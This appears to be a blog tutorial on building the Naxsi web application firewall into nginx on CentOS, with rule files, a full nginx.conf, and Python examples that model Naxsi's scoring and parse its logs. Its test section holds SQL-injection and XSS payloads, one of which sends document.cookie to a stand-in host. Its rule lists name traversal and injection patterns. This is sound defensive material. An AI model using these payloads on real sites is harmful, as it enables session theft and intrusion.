Building a Web Application Firewall with Nginx and Naxsi on CentOS Linux

Naxsi (Nginx Anti XSS & SQL Injection) is an open-source, high-performance, low-rules-maintenance web application firewall module for nginx, the well-known web server and reverse proxy. Its goal is to help protect web applications against cross-site scripting, SQL injection, cross-site request forgery, and local and remote file inclusion attacks.

2. Download Naxsi

cd /data0/software/
# GitHub serves this archive as master.zip, not "master"; save it under the
# name the later steps use. unzip creates the naxsi-master/ directory.
wget https://github.com/nbs-system/naxsi/archive/master.zip -O naxsi-master.zip
unzip naxsi-master.zip

3. Rebuild nginx with the naxsi module (this build is OpenResty, an nginx bundle). Note that the prefix below is /usr/local/openresty, while every path in the rest of this post lives under /usr/local/webserver/nginx; use the prefix of the installation whose conf and sbin directories you intend to edit. Naxsi's documentation recommends giving its --add-module before any other third-party module so that it is the first to process a request. After gmake install, confirm the module is compiled in with `<prefix>/sbin/nginx -V`: the "configure arguments" line it prints should contain the naxsi --add-module path.

cd ngx_openresty-1.4.3.6
./configure --user=www --group=www --prefix=/usr/local/openresty --with-luajit --with-http_stub_status_module --with-http_ssl_module --with-http_sub_module --with-http_realip_module --add-module=/data0/software/naxsi-master/naxsi_src/
gmake
gmake install
cd ../

4. Copy Naxsi's core rule set

cp /data0/software/naxsi-master/naxsi_config/naxsi_core.rules /usr/local/webserver/nginx/conf/

Define the security rules for one virtual host. Each MainRule in naxsi_core.rules adds points to a named counter ($SQL, $XSS, $RFI, $TRAVERSAL, $EVADE) whenever it matches part of a request; a CheckRule fires once a counter reaches its threshold, and BLOCK sends the request internally to DeniedUrl (the /RequestDenied location that returns 403 in the nginx.conf below). With LearningMode uncommented, hits are logged but nothing is blocked, which is how you collect false positives and write whitelists before enforcing.

vi /usr/local/webserver/nginx/conf/mysite.rules

Contents:

#LearningMode; #Enables learning mode
SecRulesEnabled;
#SecRulesDisabled;
DeniedUrl "/RequestDenied";
## check rules
CheckRule "$SQL >= 8" BLOCK;
CheckRule "$RFI >= 8" BLOCK;
CheckRule "$TRAVERSAL >= 4" BLOCK;
CheckRule "$EVADE >= 4" BLOCK;
CheckRule "$XSS >= 8" BLOCK;
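To make the scoring concrete, here is an added example (not code from the original post or from the Naxsi project) that reproduces Naxsi's arithmetic in Python for the ARGS zone: a hand-copied subset of naxsi_core.rules, the CheckRule thresholds from mysite.rules above, and a pass over the decoded query-string values that adds each matching rule's points once per occurrence and then applies the thresholds. The rule ids and scores were transcribed from one naxsi_core.rules revision by the writer of this example and should be checked against your own copy; the URLs are the test cases from section 6 plus a traversal payload and a benign request.

```python
"""Naxsi-style scoring of query-string values (added example, not Naxsi code).

Naxsi has no attack signatures: every MainRule adds its points to one or more
named counters each time it matches, and a CheckRule such as
    CheckRule "$SQL >= 8" BLOCK;
fires once a counter reaches its threshold. Only the ARGS zone (decoded
query-string values) is simulated here; the rule subset and its scores are
assumptions copied by hand from naxsi_core.rules.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# CheckRule thresholds from mysite.rules.
CHECK_RULES = {"$SQL": 8, "$RFI": 8, "$TRAVERSAL": 4, "$EVADE": 4, "$XSS": 8}

# (id, match spec, scores) for a subset of naxsi_core.rules. "str:" is a
# case-insensitive substring match and "rx:" a regular expression, as in
# Naxsi's own MainRule syntax. Only rules whose match zone includes ARGS
# are listed, because only ARGS is simulated.
CORE_RULES = [
    (1000, "rx:select|union|update|delete|insert|table|from|ascii|hex|unhex|drop", {"$SQL": 4}),
    (1001, 'str:"', {"$SQL": 8, "$XSS": 8}),
    (1003, "str:/*", {"$SQL": 8}),
    (1004, "str:*/", {"$SQL": 8}),
    (1008, "str:;", {"$SQL": 4, "$XSS": 8}),
    (1009, "str:=", {"$SQL": 2}),
    (1010, "str:(", {"$SQL": 4, "$XSS": 8}),
    (1011, "str:)", {"$SQL": 4, "$XSS": 8}),
    (1013, "str:'", {"$SQL": 4, "$XSS": 8}),
    (1100, "str:http://", {"$RFI": 8}),
    (1200, "str:..", {"$TRAVERSAL": 4}),
    (1202, "str:/etc/passwd", {"$TRAVERSAL": 4}),
    (1302, "str:<", {"$XSS": 8}),
    (1303, "str:>", {"$XSS": 8}),
]


def count_matches(spec, text):
    """Number of times one MainRule matches a decoded value."""
    kind, _, pattern = spec.partition(":")
    if kind == "str":
        return text.lower().count(pattern.lower())
    return len(re.findall(pattern, text, re.IGNORECASE))


def score_args(query):
    """Score every decoded query-string value against CORE_RULES.

    Returns (scores, hits): the counter totals and, for logging, the
    (rule id, zone, variable name, match count) tuples that contributed,
    which is the information Naxsi writes as idN/zoneN/var_nameN.
    """
    scores, hits = {}, []
    for name, value in parse_qsl(query, keep_blank_values=True):
        for rule_id, spec, rule_scores in CORE_RULES:
            n = count_matches(spec, value)
            if not n:
                continue
            hits.append((rule_id, "ARGS", name, n))
            for counter, points in rule_scores.items():
                scores[counter] = scores.get(counter, 0) + points * n
    return scores, hits


def evaluate(url, check_rules=CHECK_RULES):
    """Apply the CheckRule thresholds; the request is blocked if any fires."""
    scores, hits = score_args(urlsplit(url).query)
    triggered = sorted(c for c, limit in check_rules.items() if scores.get(c, 0) >= limit)
    return {"blocked": bool(triggered), "triggered": triggered, "scores": scores, "hits": hits}


if __name__ == "__main__":
    for url in (
        "http://www.abc.com/test.php?name=40/**/and/**/1=1",
        "http://www.abc.com/test.php?name=%28%29",
        "http://www.abc.com/test.php?title=meta%20http-equiv=%22refresh%22%20content=%220;%22",
        "http://www.abc.com/test.php?file=../../etc/passwd",   # not in the post; constructed
        "http://www.abc.com/test.php?name=alice&page=2",      # benign; constructed
    ):
        r = evaluate(url)
        print("BLOCK" if r["blocked"] else "PASS ", r["triggered"], r["scores"], url)
```

Running it prints one BLOCK/PASS line per URL with the counters that fired; the first test URL, for example, reaches $SQL = 34 from two "/*", two "*/" and one "=" alone, which is why even a small threshold of 8 blocks it. The model deliberately stops short of real Naxsi, which also scores parameter names, the URL path, the request body and the Cookie header, applies BasicRule whitelists before counting, and in LearningMode records the verdict without blocking.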

Edit nginx.conf

vi /usr/local/webserver/nginx/conf/nginx.conf

Add the following line inside the http block (the MainRules in naxsi_core.rules are loaded at http level; SecRulesEnabled, DeniedUrl, CheckRule and BasicRule whitelists go in the location block of the site they protect):

include       /usr/local/webserver/nginx/conf/naxsi_core.rules;

The complete nginx.conf is below. The layout is: the www.abc.com server on port 80 is the public entry point and the only place mysite.rules is included; it proxies every request to a second www.abc.com server bound to 127.0.0.1:80, which runs PHP through FastCGI and is not reachable from outside, so nothing reaches the backend without passing through Naxsi. Two things to be aware of: Naxsi writes its NAXSI_FMT lines at the error level, so the debug level on mysite_nginx_error.log is not needed for them and is very noisy in production; and the status.blog.abc.com stub_status vhost is open to anyone who can reach port 80, so restrict it with allow/deny before exposing it.

user  www www;

worker_processes 8;

error_log  /data1/logs/nginx_error.log  crit;

pid        /usr/local/webserver/nginx/nginx.pid;

#Specifies the value for maximum file descriptors that can be opened by this process.
worker_rlimit_nofile 65535;

events
{
  use epoll;
  worker_connections 65535;
}

http
{
  include       mime.types;
  include       /usr/local/webserver/nginx/conf/naxsi_core.rules;
  default_type  application/octet-stream;

  #charset  gb2312;
      
  server_names_hash_bucket_size 128;
  client_header_buffer_size 32k;
  large_client_header_buffers 4 32k;
  client_max_body_size 8m;
      
  sendfile on;
  tcp_nopush     on;

  keepalive_timeout 60;

  tcp_nodelay on;
  server_tokens off;

  fastcgi_connect_timeout 300;
  fastcgi_send_timeout 300;
  fastcgi_read_timeout 300;
  fastcgi_buffer_size 64k;
  fastcgi_buffers 4 64k;
  fastcgi_busy_buffers_size 128k;
  fastcgi_temp_file_write_size 128k;

  gzip on;
  gzip_min_length  1k;
  gzip_buffers     4 16k;
  gzip_http_version 1.0;
  gzip_comp_level 2;
  gzip_types       text/plain application/x-javascript text/css application/xml;
  gzip_vary on;

  #limit_zone  crawler  $binary_remote_addr  10m;
  log_format  access  '$remote_addr - $remote_user [$time_local] "$request" '
               '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
               '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';

  log_format  wwwlogs  '$remote_addr - $remote_user [$time_local] "$request" '
               '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
               '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';
              

  server
  {
    listen       80;
    server_name  blog.abc.com;
    index index.html index.htm index.php;
    root  /data0/htdocs/blog;

    #limit_conn   crawler  20;    
                            
    # the original pattern ended in (php|php5)?$, which made the extension
    # optional and sent any URI ending in "." to PHP-FPM as well
    location ~ .*\.(php|php5)$
    {      
      #fastcgi_pass  unix:/tmp/php-cgi.sock;
      fastcgi_pass  127.0.0.1:9000;
      fastcgi_index index.php;
      include fcgi.conf;
    }
    
    location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
    {
      expires      30d;
    }

    # same fix as the PHP location: the trailing "?" made the extension optional
    location ~ .*\.(js|css)$
    {
      expires      1h;
    }    

    access_log  /data1/logs/access.log  access;
  }

  server
  {
    listen       80;
    server_name  www.abc.com;
    index index.html index.htm index.php;
    root  /data0/htdocs/www;

    location / {
        include    /usr/local/webserver/nginx/conf/mysite.rules;
        proxy_pass http://127.0.0.1/;
        proxy_set_header Host www.abc.com;    
    }

    location /RequestDenied {
        return 403;
    }
    access_log  /data1/logs/mysite.log  wwwlogs;
    error_log  /data1/logs/mysite_nginx_error.log debug;
  }

  server
  {
    listen       127.0.0.1:80;
    server_name  www.abc.com;
    index index.html index.htm index.php;
    root  /data0/htdocs/www;

    # same fix as the front-end PHP location: the trailing "?" made the extension optional
    location ~ .*\.(php|php5)$
    {      
      #fastcgi_pass  unix:/tmp/php-cgi.sock;
      fastcgi_pass  127.0.0.1:9000;
      fastcgi_index index.php;
      include fcgi.conf;
    }

    access_log  /data1/logs/wwwlogs.log  wwwlogs;
  }

  server
  {
    listen  80;
    server_name  status.blog.abc.com;

    # stub_status exposes connection counters; add allow/deny here before
    # exposing this vhost, as it is currently readable by anyone on port 80
    location / {
      stub_status on;
      access_log   off;
    }
  }
}

5. Start nginx

# check the new binary and the configuration before touching the running instance
/usr/local/webserver/nginx/sbin/nginx -t
# stop the old instance with SIGTERM (a fast shutdown); -9 skips nginx's own cleanup
killall nginx
/usr/local/webserver/nginx/sbin/nginx

6. Testing

http://www.abc.com/test.php?name=40/**/and/**/1=1   blocked: SQL comment sequences and "=" in a parameter value (conditional injection)
http://www.abc.com/test.php?name=%28%29             blocked: "(" and ")" in a parameter value
http://www.abc.com/test.php?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E   blocked: script injection in a parameter value
http://www.abc.com/test.php?title=meta%20http-equiv=%22refresh%22%20content=%220;%22   blocked: double quotes, "=" and ";" in a parameter value

Each blocked request is answered with 403 (the DeniedUrl location) and recorded in /data1/logs/mysite_nginx_error.log as a line containing NAXSI_FMT: with the client ip, server, uri, the learning flag and one idN/zoneN/var_nameN triple per rule that matched, so you can see exactly which core rule fired on which parameter.
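A practical way to read that log is to parse the NAXSI_FMT lines rather than eyeball them. The following is an added example (not code from the original post or from the Naxsi project; the four log lines are constructed here and use documentation IP addresses): it extracts the fields from each NAXSI_FMT line, skips ordinary nginx error lines, counts events per source IP and per (rule id, zone, variable), and for hits recorded under LearningMode prints the narrow BasicRule whitelist you would add to mysite.rules if the hit turns out to be a false positive.

```python
"""Parse Naxsi's NAXSI_FMT error-log lines (added example, not Naxsi code).

Every request Naxsi blocks, or would have blocked in LearningMode, is written
to the vhost's error_log as a line containing "NAXSI_FMT:" followed by a
query-string-style field list: ip, server, uri, learning, and one
idN/zoneN/var_nameN triple per matching rule. SAMPLE_LOG is constructed for
this example; its addresses and counters are not real data.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl

SAMPLE_LOG = """\
2013/12/01 10:00:01 [error] 1234#0: *7 NAXSI_FMT: ip=203.0.113.5&server=www.abc.com&uri=/test.php&learning=0&total_processed=40&total_blocked=1&zone0=ARGS&id0=1003&var_name0=name&zone1=ARGS&id1=1004&var_name1=name&zone2=ARGS&id2=1009&var_name2=name, client: 203.0.113.5, server: www.abc.com, request: "GET /test.php?name=40/**/and/**/1=1 HTTP/1.1", host: "www.abc.com"
2013/12/01 10:00:09 [error] 1234#0: *9 NAXSI_FMT: ip=198.51.100.7&server=www.abc.com&uri=/search.php&learning=1&total_processed=41&total_blocked=1&zone0=ARGS&id0=1009&var_name0=q, client: 198.51.100.7, server: www.abc.com, request: "GET /search.php?q=a=b HTTP/1.1", host: "www.abc.com"
2013/12/01 10:00:12 [error] 1234#0: *10 open() "/data0/htdocs/www/favicon.ico" failed (2: No such file or directory), client: 198.51.100.7, server: www.abc.com, request: "GET /favicon.ico HTTP/1.1", host: "www.abc.com"
2013/12/01 10:00:30 [error] 1234#0: *12 NAXSI_FMT: ip=203.0.113.5&server=www.abc.com&uri=/test.php&learning=0&total_processed=42&total_blocked=2&zone0=ARGS&id0=1302&var_name0=term&zone1=ARGS&id1=1303&var_name1=term, client: 203.0.113.5, server: www.abc.com, request: "GET /test.php?term=%3Cscript%3E HTTP/1.1", host: "www.abc.com"
"""

# The field list ends where nginx appends its own ", client: ..." context.
NAXSI_FMT = re.compile(r"NAXSI_FMT: (?P<fields>.+?)(?:, client: |$)")


def parse_naxsi_line(line):
    """Return a dict for a NAXSI_FMT line, or None for any other error-log line."""
    m = NAXSI_FMT.search(line)
    if not m:
        return None
    fields = dict(parse_qsl(m.group("fields"), keep_blank_values=True))
    hits = []
    n = 0
    while f"id{n}" in fields:  # idN/zoneN/var_nameN are numbered from 0
        hits.append((int(fields[f"id{n}"]), fields.get(f"zone{n}", ""), fields.get(f"var_name{n}", "")))
        n += 1
    return {
        "ip": fields.get("ip"),
        "server": fields.get("server"),
        "uri": fields.get("uri"),
        "learning": fields.get("learning") == "1",
        "hits": hits,
    }


def summarize(log_text):
    """Aggregate NAXSI_FMT events by source IP and by (rule id, zone, variable)."""
    events = [e for e in map(parse_naxsi_line, log_text.splitlines()) if e]
    by_ip = Counter(e["ip"] for e in events)
    by_rule = Counter(hit for e in events for hit in e["hits"])
    return events, by_ip, by_rule


# Naxsi match-zone names used in BasicRule whitelists for a named variable.
ZONE_TO_MZ = {"ARGS": "$ARGS_VAR", "BODY": "$BODY_VAR", "HEADERS": "$HEADERS_VAR"}


def suggest_whitelist(rule_id, zone, var_name):
    """BasicRule whitelist for one (rule, zone, variable) combination.

    This is the form Naxsi accepts in a vhost rules file such as mysite.rules.
    Add one only after confirming the hit is a false positive, and keep it as
    narrow as this: one rule id, one variable.
    """
    mz = ZONE_TO_MZ.get(zone)
    if mz is None or not var_name:
        return f'BasicRule wl:{rule_id} "mz:{zone}";'
    return f'BasicRule wl:{rule_id} "mz:{mz}:{var_name}";'


if __name__ == "__main__":
    events, by_ip, by_rule = summarize(SAMPLE_LOG)
    for ip, count in by_ip.most_common():
        print(f"{count:3d} events from {ip}")
    for (rule_id, zone, var), count in by_rule.most_common():
        print(f"{count:3d} x id {rule_id} in {zone}:{var}")
    # Hits recorded in LearningMode are the whitelist candidates to review.
    for e in events:
        if e["learning"]:
            for hit in e["hits"]:
                print("candidate:", suggest_whitelist(*hit))
```

On the sample the learning-mode hit is rule 1009 ("=") on the q parameter of /search.php, a classic false positive for a search box, and the suggested line is `BasicRule wl:1009 "mz:$ARGS_VAR:q";`. The same parse works on a live file with `summarize(open(path).read())`; pair it with the ip counts to spot one client tripping many different rules, which is the pattern of a scanner rather than a broken form.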

Unless otherwise noted, the posts on this blog are original; when reposting, please credit the source with a link to this address.
Original URL: http://blog.cnwyhx.com/?p=301
